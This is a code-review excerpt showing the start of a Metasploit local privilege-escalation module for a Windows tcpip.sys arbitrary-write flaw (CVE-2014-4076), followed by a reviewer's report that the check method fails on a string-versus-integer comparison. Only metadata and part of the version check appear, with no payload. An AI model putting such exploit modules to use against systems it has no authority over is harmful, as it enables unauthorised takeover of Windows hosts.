modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb

```diff
@@ -0,0 +1,182 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/local/windows_kernel'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  include Msf::Exploit::Local::WindowsKernel
+  include Msf::Post::File
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'          => 'Windows tcpip.sys Arbitrary Write Privilege Escalation',
+      'Description'    => %q{
+        A vulnerability within Microsoft TCP/IP protocol driver, tcpip.sys, can allow an attacker
+        to inject memory controlled by the attacker into an arbitrary location.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
+          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
+        ],
+      'Arch'          => ARCH_X86,
+      'Platform'      => 'win',
+      'SessionTypes'  => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'       =>
+        [
+          ['Windows Server 2003 SP2', {} ]
+        ],
+      'References'    =>
+        [
+          ['CVE', '2014-4076'],
+          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt']
+        ],
+      'DisclosureDate'=> 'Nov 11 2014',
+      'DefaultTarget' => 0
+    }))
+
+  end
+
+  def check
+    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+      return Exploit::CheckCode::Safe
+    end
+
+    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    return Exploit::CheckCode::Safe unless handle
+
+    session.railgun.kernel32.CloseHandle(handle)
+
+    file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys"
+    unless file?(file_path)
+      return Exploit::CheckCode::Unknown
+    end
+
+    major, minor, build, revision, branch = file_version(file_path)
+    vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
+
+    if ("#{major}.#{minor}.#{build}" == "5.2.3790" && "#{revision}" < 5440)
```

Comment:
This seems to be raising an ArgumentError when I run the check method. ```revision``` should probably be converted to an integer (not a string) if it is not one already.

Example output:
```
msf-git (S:1 J:0) exploit(ms14_070_tcpip_ioctl) > check

[*] [2015.01.29-13:28:51] tcpip.sys file version: 5.2.3790.4573 branch: 45
[-] 192.168.90.142 - Check failed: ArgumentError comparison of String with 5440 failed
```